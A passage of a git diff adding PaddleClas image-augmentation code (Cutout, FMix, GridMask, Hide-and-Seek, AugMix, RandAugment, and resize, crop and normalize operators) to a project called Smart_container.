self.magnitude1 = ranges[operation1][magnitude_idx1] + self.p2 = p2 + self.operation2 = func[operation2] + self.magnitude2 = ranges[operation2][magnitude_idx2] + + def __call__(self, img): + if random.random() < self.p1: + img = self.operation1(img, self.magnitude1) + if random.random() < self.p2: + img = self.operation2(img, self.magnitude2) + return img diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/ops/cutout.py b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/cutout.py new file mode 100644 index 0000000..b906e14 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/cutout.py @@ -0,0 +1,41 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +# This code is based on https://github.com/uoguelph-mlrg/Cutout + +import numpy as np +import random + + +class Cutout(object): + def __init__(self, n_holes=1, length=112): + self.n_holes = n_holes + self.length = length + + def __call__(self, img): + """ cutout_image """ + h, w = img.shape[:2] + mask = np.ones((h, w), np.float32) + + for n in range(self.n_holes): + y = np.random.randint(h) + x = np.random.randint(w) + + y1 = np.clip(y - self.length // 2, 0, h) + y2 = np.clip(y + self.length // 2, 0, h) + x1 = np.clip(x - self.length // 2, 0, w) + x2 = np.clip(x + self.length // 2, 0, w) + + img[y1:y2, x1:x2] = 0 + return img diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/ops/fmix.py b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/fmix.py new file mode 100644 index 0000000..dc2ef91 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/fmix.py @@ -0,0 +1,217 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import math +import random + +import numpy as np +from scipy.stats import beta + + +def fftfreqnd(h, w=None, z=None): + """ Get bin values for discrete fourier transform of size (h, w, z) + + :param h: Required, first dimension size + :param w: Optional, second dimension size + :param z: Optional, third dimension size + """ + fz = fx = 0 + fy = np.fft.fftfreq(h) + + if w is not None: + fy = np.expand_dims(fy, -1) + + if w % 2 == 1: + fx = np.fft.fftfreq(w)[:w // 2 + 2] + else: + fx = np.fft.fftfreq(w)[:w // 2 + 1] + + if z is not None: + fy = np.expand_dims(fy, -1) + if z % 2 == 1: + fz = np.fft.fftfreq(z)[:, None] + else: + fz = np.fft.fftfreq(z)[:, None] + + return np.sqrt(fx * fx + fy * fy + fz * fz) + + +def get_spectrum(freqs, decay_power, ch, h, w=0, z=0): + """ Samples a fourier image with given size and frequencies decayed by decay power + + :param freqs: Bin values for the discrete fourier transform + :param decay_power: Decay power for frequency decay prop 1/f**d + :param ch: Number of channels for the resulting mask + :param h: Required, first dimension size + :param w: Optional, second dimension size + :param z: Optional, third dimension size + """ + scale = np.ones(1) / (np.maximum(freqs, np.array([1. / max(w, h, z)])) + **decay_power) + + param_size = [ch] + list(freqs.shape) + [2] + param = np.random.randn(*param_size) + + scale = np.expand_dims(scale, -1)[None, :] + + return scale * param + + +def make_low_freq_image(decay, shape, ch=1): + """ Sample a low frequency image from fourier space + + :param decay_power: Decay power for frequency decay prop 1/f**d + :param shape: Shape of desired mask, list up to 3 dims + :param ch: Number of channels for desired mask + """ + freqs = fftfreqnd(*shape) + spectrum = get_spectrum(freqs, decay, ch, + *shape) #.reshape((1, *shape[:-1], -1)) + spectrum = spectrum[:, 0] + 1j * spectrum[:, 1] + mask = np.real(np.fft.irfftn(spectrum, shape)) + + if len(shape) == 1: + mask = mask[:1, :shape[0]] + if len(shape) == 2: + mask = mask[:1, :shape[0], :shape[1]] + if len(shape) == 3: + mask = mask[:1, :shape[0], :shape[1], :shape[2]] + + mask = mask + mask = (mask - mask.min()) + mask = mask / mask.max() + return mask + + +def sample_lam(alpha, reformulate=False): + """ Sample a lambda from symmetric beta distribution with given alpha + + :param alpha: Alpha value for beta distribution + :param reformulate: If True, uses the reformulation of [1]. + """ + if reformulate: + lam = beta.rvs(alpha + 1, alpha) + else: + lam = beta.rvs(alpha, alpha) + + return lam + + +def binarise_mask(mask, lam, in_shape, max_soft=0.0): + """ Binarises a given low frequency image such that it has mean lambda. + + :param mask: Low frequency image, usually the result of `make_low_freq_image` + :param lam: Mean value of final mask + :param in_shape: Shape of inputs + :param max_soft: Softening value between 0 and 0.5 which smooths hard edges in the mask. + :return: + """ + idx = mask.reshape(-1).argsort()[::-1] + mask = mask.reshape(-1) + num = math.ceil(lam * mask.size) if random.random() > 0.5 else math.floor( + lam * mask.size) + + eff_soft = max_soft + if max_soft > lam or max_soft > (1 - lam): + eff_soft = min(lam, 1 - lam) + + soft = int(mask.size * eff_soft) + num_low = int(num - soft) + num_high = int(num + soft) + + mask[idx[:num_high]] = 1 + mask[idx[num_low:]] = 0 + mask[idx[num_low:num_high]] = np.linspace(1, 0, (num_high - num_low)) + + mask = mask.reshape((1, 1, in_shape[0], in_shape[1])) + return mask + + +def sample_mask(alpha, decay_power, shape, max_soft=0.0, reformulate=False): + """ Samples a mean lambda from beta distribution parametrised by alpha, creates a low frequency image and binarises + it based on this lambda + + :param alpha: Alpha value for beta distribution from which to sample mean of mask + :param decay_power: Decay power for frequency decay prop 1/f**d + :param shape: Shape of desired mask, list up to 3 dims + :param max_soft: Softening value between 0 and 0.5 which smooths hard edges in the mask. + :param reformulate: If True, uses the reformulation of [1]. + """ + if isinstance(shape, int): + shape = (shape, ) + + # Choose lambda + lam = sample_lam(alpha, reformulate) + + # Make mask, get mean / std + mask = make_low_freq_image(decay_power, shape) + mask = binarise_mask(mask, lam, shape, max_soft) + + return float(lam), mask + + +def sample_and_apply(x, + alpha, + decay_power, + shape, + max_soft=0.0, + reformulate=False): + """ + + :param x: Image batch on which to apply fmix of shape [b, c, shape*] + :param alpha: Alpha value for beta distribution from which to sample mean of mask + :param decay_power: Decay power for frequency decay prop 1/f**d + :param shape: Shape of desired mask, list up to 3 dims + :param max_soft: Softening value between 0 and 0.5 which smooths hard edges in the mask. + :param reformulate: If True, uses the reformulation of [1]. + :return: mixed input, permutation indices, lambda value of mix, + """ + lam, mask = sample_mask(alpha, decay_power, shape, max_soft, reformulate) + index = np.random.permutation(x.shape[0]) + + x1, x2 = x * mask, x[index] * (1 - mask) + return x1 + x2, index, lam + + +class FMixBase: + """ FMix augmentation + + Args: + decay_power (float): Decay power for frequency decay prop 1/f**d + alpha (float): Alpha value for beta distribution from which to sample mean of mask + size ([int] | [int, int] | [int, int, int]): Shape of desired mask, list up to 3 dims + max_soft (float): Softening value between 0 and 0.5 which smooths hard edges in the mask. + reformulate (bool): If True, uses the reformulation of [1]. + """ + + def __init__(self, + decay_power=3, + alpha=1, + size=(32, 32), + max_soft=0.0, + reformulate=False): + super().__init__() + self.decay_power = decay_power + self.reformulate = reformulate + self.size = size + self.alpha = alpha + self.max_soft = max_soft + self.index = None + self.lam = None + + def __call__(self, x): + raise NotImplementedError + + def loss(self, *args, **kwargs): + raise NotImplementedError diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/ops/functional.py b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/functional.py new file mode 100644 index 0000000..9f1369e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/functional.py @@ -0,0 +1,138 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +# encoding: utf-8 + +import numpy as np +from PIL import Image, ImageOps, ImageEnhance + + + +def int_parameter(level, maxval): + """Helper function to scale `val` between 0 and maxval . + Args: + level: Level of the operation that will be between [0, `PARAMETER_MAX`]. + maxval: Maximum value that the operation can have. This will be scaled to + level/PARAMETER_MAX. + Returns: + An int that results from scaling `maxval` according to `level`. + """ + return int(level * maxval / 10) + + +def float_parameter(level, maxval): + """Helper function to scale `val` between 0 and maxval. + Args: + level: Level of the operation that will be between [0, `PARAMETER_MAX`]. + maxval: Maximum value that the operation can have. This will be scaled to + level/PARAMETER_MAX. + Returns: + A float that results from scaling `maxval` according to `level`. + """ + return float(level) * maxval / 10. + + +def sample_level(n): + return np.random.uniform(low=0.1, high=n) + + +def autocontrast(pil_img, *args): + return ImageOps.autocontrast(pil_img) + + +def equalize(pil_img, *args): + return ImageOps.equalize(pil_img) + + +def posterize(pil_img, level, *args): + level = int_parameter(sample_level(level), 4) + return ImageOps.posterize(pil_img, 4 - level) + + +def rotate(pil_img, level, *args): + degrees = int_parameter(sample_level(level), 30) + if np.random.uniform() > 0.5: + degrees = -degrees + return pil_img.rotate(degrees, resample=Image.BILINEAR) + + +def solarize(pil_img, level, *args): + level = int_parameter(sample_level(level), 256) + return ImageOps.solarize(pil_img, 256 - level) + + +def shear_x(pil_img, level): + level = float_parameter(sample_level(level), 0.3) + if np.random.uniform() > 0.5: + level = -level + return pil_img.transform(pil_img.size, + Image.AFFINE, (1, level, 0, 0, 1, 0), + resample=Image.BILINEAR) + + +def shear_y(pil_img, level): + level = float_parameter(sample_level(level), 0.3) + if np.random.uniform() > 0.5: + level = -level + return pil_img.transform(pil_img.size, + Image.AFFINE, (1, 0, 0, level, 1, 0), + resample=Image.BILINEAR) + + +def translate_x(pil_img, level): + level = int_parameter(sample_level(level), pil_img.size[0] / 3) + if np.random.random() > 0.5: + level = -level + return pil_img.transform(pil_img.size, + Image.AFFINE, (1, 0, level, 0, 1, 0), + resample=Image.BILINEAR) + + +def translate_y(pil_img, level): + level = int_parameter(sample_level(level), pil_img.size[1] / 3) + if np.random.random() > 0.5: + level = -level + return pil_img.transform(pil_img.size, + Image.AFFINE, (1, 0, 0, 0, 1, level), + resample=Image.BILINEAR) + + +# operation that overlaps with ImageNet-C's test set +def color(pil_img, level, *args): + level = float_parameter(sample_level(level), 1.8) + 0.1 + return ImageEnhance.Color(pil_img).enhance(level) + + +# operation that overlaps with ImageNet-C's test set +def contrast(pil_img, level, *args): + level = float_parameter(sample_level(level), 1.8) + 0.1 + return ImageEnhance.Contrast(pil_img).enhance(level) + + +# operation that overlaps with ImageNet-C's test set +def brightness(pil_img, level, *args): + level = float_parameter(sample_level(level), 1.8) + 0.1 + return ImageEnhance.Brightness(pil_img).enhance(level) + + +# operation that overlaps with ImageNet-C's test set +def sharpness(pil_img, level, *args): + level = float_parameter(sample_level(level), 1.8) + 0.1 + return ImageEnhance.Sharpness(pil_img).enhance(level) + + +augmentations = [ + autocontrast, equalize, posterize, rotate, solarize, shear_x, shear_y, + translate_x, translate_y +] diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/ops/grid.py b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/grid.py new file mode 100644 index 0000000..6f0b2dc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/grid.py @@ -0,0 +1,89 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +# This code is based on https://github.com/akuxcw/GridMask + +import numpy as np +from PIL import Image +import pdb + +# curr +CURR_EPOCH = 0 +# epoch for the prob to be the upper limit +NUM_EPOCHS = 240 + + +class GridMask(object): + def __init__(self, d1=96, d2=224, rotate=1, ratio=0.5, mode=0, prob=1.): + self.d1 = d1 + self.d2 = d2 + self.rotate = rotate + self.ratio = ratio + self.mode = mode + self.st_prob = prob + self.prob = prob + self.last_prob = -1 + + def set_prob(self): + global CURR_EPOCH + global NUM_EPOCHS + self.prob = self.st_prob * min(1, 1.0 * CURR_EPOCH / NUM_EPOCHS) + + def __call__(self, img): + self.set_prob() + if abs(self.last_prob - self.prob) > 1e-10: + global CURR_EPOCH + global NUM_EPOCHS + print( + "self.prob is updated, self.prob={}, CURR_EPOCH: {}, NUM_EPOCHS: {}". + format(self.prob, CURR_EPOCH, NUM_EPOCHS)) + self.last_prob = self.prob + # print("CURR_EPOCH: {}, NUM_EPOCHS: {}, self.prob is set as: {}".format(CURR_EPOCH, NUM_EPOCHS, self.prob) ) + if np.random.rand() > self.prob: + return img + _, h, w = img.shape + hh = int(1.5 * h) + ww = int(1.5 * w) + d = np.random.randint(self.d1, self.d2) + #d = self.d + self.l = int(d * self.ratio + 0.5) + mask = np.ones((hh, ww), np.float32) + st_h = np.random.randint(d) + st_w = np.random.randint(d) + for i in range(-1, hh // d + 1): + s = d * i + st_h + t = s + self.l + s = max(min(s, hh), 0) + t = max(min(t, hh), 0) + mask[s:t, :] *= 0 + for i in range(-1, ww // d + 1): + s = d * i + st_w + t = s + self.l + s = max(min(s, ww), 0) + t = max(min(t, ww), 0) + mask[:, s:t] *= 0 + r = np.random.randint(self.rotate) + mask = Image.fromarray(np.uint8(mask)) + mask = mask.rotate(r) + mask = np.asarray(mask) + mask = mask[(hh - h) // 2:(hh - h) // 2 + h, (ww - w) // 2:(ww - w) // + 2 + w] + + if self.mode == 1: + mask = 1 - mask + + mask = np.expand_dims(mask, axis=0) + img = (img * mask).astype(img.dtype) + + return img diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/ops/hide_and_seek.py b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/hide_and_seek.py new file mode 100644 index 0000000..33f25f2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/hide_and_seek.py @@ -0,0 +1,44 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +# This code is based on https://github.com/kkanshul/Hide-and-Seek + +import numpy as np +import random + + +class HideAndSeek(object): + def __init__(self): + # possible grid size, 0 means no hiding + self.grid_sizes = [0, 16, 32, 44, 56] + # hiding probability + self.hide_prob = 0.5 + + def __call__(self, img): + # randomly choose one grid size + grid_size = np.random.choice(self.grid_sizes) + + _, h, w = img.shape + + # hide the patches + if grid_size == 0: + return img + for x in range(0, w, grid_size): + for y in range(0, h, grid_size): + x_end = min(w, x + grid_size) + y_end = min(h, y + grid_size) + if (random.random() <= self.hide_prob): + img[:, x:x_end, y:y_end] = 0 + + return img diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/ops/operators.py b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/operators.py new file mode 100644 index 0000000..e46823d --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/operators.py @@ -0,0 +1,386 @@ +""" +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +""" + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function +from __future__ import unicode_literals + +from functools import partial +import six +import math +import random +import cv2 +import numpy as np +from PIL import Image +from paddle.vision.transforms import ColorJitter as RawColorJitter + +from .autoaugment import ImageNetPolicy +from .functional import augmentations +from ppcls.utils import logger + + +class UnifiedResize(object): + def __init__(self, interpolation=None, backend="cv2"): + _cv2_interp_from_str = { + 'nearest': cv2.INTER_NEAREST, + 'bilinear': cv2.INTER_LINEAR, + 'area': cv2.INTER_AREA, + 'bicubic': cv2.INTER_CUBIC, + 'lanczos': cv2.INTER_LANCZOS4 + } + _pil_interp_from_str = { + 'nearest': Image.NEAREST, + 'bilinear': Image.BILINEAR, + 'bicubic': Image.BICUBIC, + 'box': Image.BOX, + 'lanczos': Image.LANCZOS, + 'hamming': Image.HAMMING + } + + def _pil_resize(src, size, resample): + pil_img = Image.fromarray(src) + pil_img = pil_img.resize(size, resample) + return np.asarray(pil_img) + + if backend.lower() == "cv2": + if isinstance(interpolation, str): + interpolation = _cv2_interp_from_str[interpolation.lower()] + # compatible with opencv < version 4.4.0 + elif not interpolation: + interpolation = cv2.INTER_LINEAR + self.resize_func = partial(cv2.resize, interpolation=interpolation) + elif backend.lower() == "pil": + if isinstance(interpolation, str): + interpolation = _pil_interp_from_str[interpolation.lower()] + self.resize_func = partial(_pil_resize, resample=interpolation) + else: + logger.warning( + f"The backend of Resize only support \"cv2\" or \"PIL\". \"f{backend}\" is unavailable. Use \"cv2\" instead." + ) + self.resize_func = cv2.resize + + def __call__(self, src, size): + return self.resize_func(src, size) + + +class OperatorParamError(ValueError): + """ OperatorParamError + """ + pass + + +class DecodeImage(object): + """ decode image """ + + def __init__(self, to_rgb=True, to_np=False, channel_first=False): + self.to_rgb = to_rgb + self.to_np = to_np # to numpy + self.channel_first = channel_first # only enabled when to_np is True + + def __call__(self, img): + if six.PY2: + assert type(img) is str and len( + img) > 0, "invalid input 'img' in DecodeImage" + else: + assert type(img) is bytes and len( + img) > 0, "invalid input 'img' in DecodeImage" + data = np.frombuffer(img, dtype='uint8') + img = cv2.imdecode(data, 1) + if self.to_rgb: + assert img.shape[2] == 3, 'invalid shape of image[%s]' % ( + img.shape) + img = img[:, :, ::-1] + + if self.channel_first: + img = img.transpose((2, 0, 1)) + + return img + + +class ResizeImage(object): + """ resize image """ + + def __init__(self, + size=None, + resize_short=None, + interpolation=None, + backend="cv2"): + if resize_short is not None and resize_short > 0: + self.resize_short = resize_short + self.w = None + self.h = None + elif size is not None: + self.resize_short = None + self.w = size if type(size) is int else size[0] + self.h = size if type(size) is int else size[1] + else: + raise OperatorParamError("invalid params for ReisizeImage for '\ + 'both 'size' and 'resize_short' are None") + + self._resize_func = UnifiedResize( + interpolation=interpolation, backend=backend) + + def __call__(self, img): + img_h, img_w = img.shape[:2] + if self.resize_short is not None: + percent = float(self.resize_short) / min(img_w, img_h) + w = int(round(img_w * percent)) + h = int(round(img_h * percent)) + else: + w = self.w + h = self.h + return self._resize_func(img, (w, h)) + + +class CropImage(object): + """ crop image """ + + def __init__(self, size): + if type(size) is int: + self.size = (size, size) + else: + self.size = size # (h, w) + + def __call__(self, img): + w, h = self.size + img_h, img_w = img.shape[:2] + w_start = (img_w - w) // 2 + h_start = (img_h - h) // 2 + + w_end = w_start + w + h_end = h_start + h + return img[h_start:h_end, w_start:w_end, :] + + +class RandCropImage(object): + """ random crop image """ + + def __init__(self, + size, + scale=None, + ratio=None, + interpolation=None, + backend="cv2"): + if type(size) is int: + self.size = (size, size) # (h, w) + else: + self.size = size + + self.scale = [0.08, 1.0] if scale is None else scale + self.ratio = [3. / 4., 4. / 3.] if ratio is None else ratio + + self._resize_func = UnifiedResize( + interpolation=interpolation, backend=backend) + + def __call__(self, img): + size = self.size + scale = self.scale + ratio = self.ratio + + aspect_ratio = math.sqrt(random.uniform(*ratio)) + w = 1. * aspect_ratio + h = 1. / aspect_ratio + + img_h, img_w = img.shape[:2] + + bound = min((float(img_w) / img_h) / (w**2), + (float(img_h) / img_w) / (h**2)) + scale_max = min(scale[1], bound) + scale_min = min(scale[0], bound) + + target_area = img_w * img_h * random.uniform(scale_min, scale_max) + target_size = math.sqrt(target_area) + w = int(target_size * w) + h = int(target_size * h) + + i = random.randint(0, img_w - w) + j = random.randint(0, img_h - h) + + img = img[j:j + h, i:i + w, :] + + return self._resize_func(img, size) + + +class RandFlipImage(object): + """ random flip image + flip_code: + 1: Flipped Horizontally + 0: Flipped Vertically + -1: Flipped Horizontally & Vertically + """ + + def __init__(self, flip_code=1): + assert flip_code in [-1, 0, 1 + ], "flip_code should be a value in [-1, 0, 1]" + self.flip_code = flip_code + + def __call__(self, img): + if random.randint(0, 1) == 1: + return cv2.flip(img, self.flip_code) + else: + return img + + +class AutoAugment(object): + def __init__(self): + self.policy = ImageNetPolicy() + + def __call__(self, img): + from PIL import Image + img = np.ascontiguousarray(img) + img = Image.fromarray(img) + img = self.policy(img) + img = np.asarray(img) + + +class NormalizeImage(object): + """ normalize image such as substract mean, divide std + """ + + def __init__(self, + scale=None, + mean=None, + std=None, + order='chw', + output_fp16=False, + channel_num=3): + if isinstance(scale, str): + scale = eval(scale) + assert channel_num in [ + 3, 4 + ], "channel number of input image should be set to 3 or 4." + self.channel_num = channel_num + self.output_dtype = 'float16' if output_fp16 else 'float32' + self.scale = np.float32(scale if scale is not None else 1.0 / 255.0) + self.order = order + mean = mean if mean is not None else [0.485, 0.456, 0.406] + std = std if std is not None else [0.229, 0.224, 0.225] + + shape = (3, 1, 1) if self.order == 'chw' else (1, 1, 3) + self.mean = np.array(mean).reshape(shape).astype('float32') + self.std = np.array(std).reshape(shape).astype('float32') + + def __call__(self, img): + from PIL import Image + if isinstance(img, Image.Image): + img = np.array(img) + + assert isinstance(img, + np.ndarray), "invalid input 'img' in NormalizeImage" + + img = (img.astype('float32') * self.scale - self.mean) / self.std + + if self.channel_num == 4: + img_h = img.shape[1] if self.order == 'chw' else img.shape[0] + img_w = img.shape[2] if self.order == 'chw' else img.shape[1] + pad_zeros = np.zeros( + (1, img_h, img_w)) if self.order == 'chw' else np.zeros( + (img_h, img_w, 1)) + img = (np.concatenate( + (img, pad_zeros), axis=0) + if self.order == 'chw' else np.concatenate( + (img, pad_zeros), axis=2)) + return img.astype(self.output_dtype) + + +class ToCHWImage(object): + """ convert hwc image to chw image + """ + + def __init__(self): + pass + + def __call__(self, img): + from PIL import Image + if isinstance(img, Image.Image): + img = np.array(img) + + return img.transpose((2, 0, 1)) + + +class AugMix(object): + """ Perform AugMix augmentation and compute mixture. + """ + + def __init__(self, + prob=0.5, + aug_prob_coeff=0.1, + mixture_width=3, + mixture_depth=1, + aug_severity=1): + """ + Args: + prob: Probability of taking augmix + aug_prob_coeff: Probability distribution coefficients. + mixture_width: Number of augmentation chains to mix per augmented example. + mixture_depth: Depth of augmentation chains. -1 denotes stochastic depth in [1, 3]' + aug_severity: Severity of underlying augmentation operators (between 1 to 10). + """ + # fmt: off + self.prob = prob + self.aug_prob_coeff = aug_prob_coeff + self.mixture_width = mixture_width + self.mixture_depth = mixture_depth + self.aug_severity = aug_severity + self.augmentations = augmentations + # fmt: on + + def __call__(self, image): + """Perform AugMix augmentations and compute mixture. + Returns: + mixed: Augmented and mixed image. + """ + if random.random() > self.prob: + # Avoid the warning: the given NumPy array is not writeable + return np.asarray(image).copy() + + ws = np.float32( + np.random.dirichlet([self.aug_prob_coeff] * self.mixture_width)) + m = np.float32( + np.random.beta(self.aug_prob_coeff, self.aug_prob_coeff)) + + # image = Image.fromarray(image) + mix = np.zeros([image.shape[1], image.shape[0], 3]) + for i in range(self.mixture_width): + image_aug = image.copy() + image_aug = Image.fromarray(image_aug) + depth = self.mixture_depth if self.mixture_depth > 0 else np.random.randint( + 1, 4) + for _ in range(depth): + op = np.random.choice(self.augmentations) + image_aug = op(image_aug, self.aug_severity) + mix += ws[i] * np.asarray(image_aug) + + mixed = (1 - m) * image + m * mix + return mixed.astype(np.uint8) + + +class ColorJitter(RawColorJitter): + """ColorJitter. + """ + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + + def __call__(self, img): + if not isinstance(img, Image.Image): + img = np.ascontiguousarray(img) + img = Image.fromarray(img) + img = super()._apply_image(img) + if isinstance(img, Image.Image): + img = np.asarray(img) + return img diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/ops/randaugment.py b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/randaugment.py new file mode 100644 index 0000000..cca59da --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/randaugment.py @@ -0,0 +1,106 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +# This code is based on https://github.com/heartInsert/randaugment + +from PIL import Image, ImageEnhance, ImageOps +import numpy as np +import random + + +class RandAugment(object): + def __init__(self, num_layers=2, magnitude=5, fillcolor=(128, 128, 128)): + self.num_layers = num_layers + self.magnitude = magnitude + self.max_level = 10 + + abso_level = self.magnitude / self.max_level + self.level_map = { + "shearX": 0.3 * abso_level, + "shearY": 0.3 * abso_level, + "translateX": 150.0 / 331 * abso_level, + "translateY": 150.0 / 331 * abso_level, + "rotate": 30 * abso_level, + "color": 0.9 * abso_level, + "posterize": int(4.0 * abso_level), + "solarize": 256.0 * abso_level, + "contrast": 0.9 * abso_level, + "sharpness": 0.9 * abso_level, + "brightness": 0.9 * abso_level, + "autocontrast": 0, + "equalize": 0, + "invert": 0 + } + + # from https://stackoverflow.com/questions/5252170/ + # specify-image-filling-color-when-rotating-in-python-with-pil-and-setting-expand + def rotate_with_fill(img, magnitude): + rot = img.convert("RGBA").rotate(magnitude) + return Image.composite(rot, + Image.new("RGBA", rot.size, (128, ) * 4), + rot).convert(img.mode) + + rnd_ch_op = random.choice + + self.func = { + "shearX": lambda img, magnitude: img.transform( + img.size, + Image.AFFINE, + (1, magnitude * rnd_ch_op([-1, 1]), 0, 0, 1, 0), + Image.BICUBIC, + fillcolor=fillcolor), + "shearY": lambda img, magnitude: img.transform( + img.size, + Image.AFFINE, + (1, 0, 0, magnitude * rnd_ch_op([-1, 1]), 1, 0), + Image.BICUBIC, + fillcolor=fillcolor), + "translateX": lambda img, magnitude: img.transform( + img.size, + Image.AFFINE, + (1, 0, magnitude * img.size[0] * rnd_ch_op([-1, 1]), 0, 1, 0), + fillcolor=fillcolor), + "translateY": lambda img, magnitude: img.transform( + img.size, + Image.AFFINE, + (1, 0, 0, 0, 1, magnitude * img.size[1] * rnd_ch_op([-1, 1])), + fillcolor=fillcolor), + "rotate": lambda img, magnitude: rotate_with_fill(img, magnitude), + "color": lambda img, magnitude: ImageEnhance.Color(img).enhance( + 1 + magnitude * rnd_ch_op([-1, 1])), + "posterize": lambda img, magnitude: + ImageOps.posterize(img, magnitude), + "solarize": lambda img, magnitude: + ImageOps.solarize(img, magnitude), + "contrast": lambda img, magnitude: + ImageEnhance.Contrast(img).enhance( + 1 + magnitude * rnd_ch_op([-1, 1])), + "sharpness": lambda img, magnitude: + ImageEnhance.Sharpness(img).enhance( + 1 + magnitude * rnd_ch_op([-1, 1])), + "brightness": lambda img, magnitude: + ImageEnhance.Brightness(img).enhance( + 1 + magnitude * rnd_ch_op([-1, 1])), + "autocontrast": lambda img, magnitude: + ImageOps.autocontrast(img), + "equalize": lambda img, magnitude: ImageOps.equalize(img), + "invert": lambda img, magnitude: ImageOps.invert(img) + } + + def __call__(self, img): + avaiable_op_names = list(self.level_map.keys()) + for layer_num in range(self.num_layers): + op_name = np.random.choice(avaiable_op_names) + img = self.func[op_name](img, self.level_map[op_name]) + return img diff --git a/Smart_container/PaddleClas/ppcls/data/preprocess/ops/random_erasing.py b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/random_erasing.py new file mode 100644 index 0000000..f234abb --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/preprocess/ops/random_erasing.py @@ -0,0 +1,90 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +#This code is adapted from https://github.com/zhunzhong07/Random-Erasing, and refer to Timm. + +from functools import partial + +import math +import random + +import numpy as np + + +class Pixels(object): + def __init__(self, mode="const", mean=[0., 0., 0.]): + self._mode = mode + self._mean = mean + + def __call__(self, h=224, w=224, c=3): + if self._mode == "rand": + return np.random.normal(size=(1, 1, 3)) + elif self._mode == "pixel": + return np.random.normal(size=(h, w, c)) + elif self._mode == "const": + return self._mean + else: + raise Exception( + "Invalid mode in RandomErasing, only support \"const\", \"rand\", 